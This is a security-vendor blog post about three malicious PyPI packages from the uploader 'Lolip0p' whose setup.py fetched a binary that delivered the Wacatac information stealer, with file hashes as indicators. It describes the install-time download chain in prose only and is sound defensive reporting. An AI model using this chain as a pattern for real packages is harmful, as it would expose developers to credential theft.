The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

Malicious Lolip0p PyPI Packages Drop Wacatac

Jan 27, 2023 2:58:20 PM / by The Hivemind

malicious lolip0pRelated Families: Wacatac

Executive Summary

Fortinet recently reported on a supply chain attack in which threat actors leveraged a 0-day attack embedded in three PyPI packages to deliver Wacatac.

Key Takeaways

  • In a recent supply chain attack, threat actors used a 0-day attack embedded in three PyPI packages to deliver a malicious payload.
  • The malicious packages were all uploaded by the user Lolip0p.
  • The payload was Wacatac, an information stealer. 

Background

In our recent PolySwarm’s 2023 Analyst Predictions threat bulletin, we predicted threat actors would continue the software supply chain attacks trend, including targeting open-source code repositories. Fortinet recently reported on a supply chain attack in which threat actors leveraged a 0-day attack embedded in three PyPI packages. Affected packages included ‘colorslib’, ‘httpslib’, and ‘libhttps’. All three packages were published in early January by a user known as Lolip0p.

Based on their profile information, Lolip0p apparently joined the PyPI repository shortly before posting the first two packages on January 7th. The third package was published on January 12th. The packages were given a legitimate-looking description but were all malicious.

According to researchers at Fortinet, all three packages have an identical setup.py script. All three run a PowerShell script with a suspicious URL that leads to the download of a binary, Oxyz.exe. Oxyz.exe drops another executable, update.exe, that runs in a temp folder and drops multiple files into the folder. One of the dropped files is SearchProtocolHost.exe, which is detected as the Wacatac trojan.

What is Wacatac?

Wacatac is an information stealer that gathers multiple types of victim information, including login credentials and banking information. Threat actors can use Wacatac to deploy additional payloads, such as ransomware.

IOCs

PolySwarm has multiple samples associated with this activity.

8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b (Oxyz.exe)

293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757 (Update.exe)

 

You can use the following CLI command to search for all related samples in our portal:

$ polyswarm link list -f Lolip0p


Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports

Topics: Threat Bulletin, PyPI, Supply Chain Attack, Lolip0p, Wacatac

The Hivemind

Written by The Hivemind

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts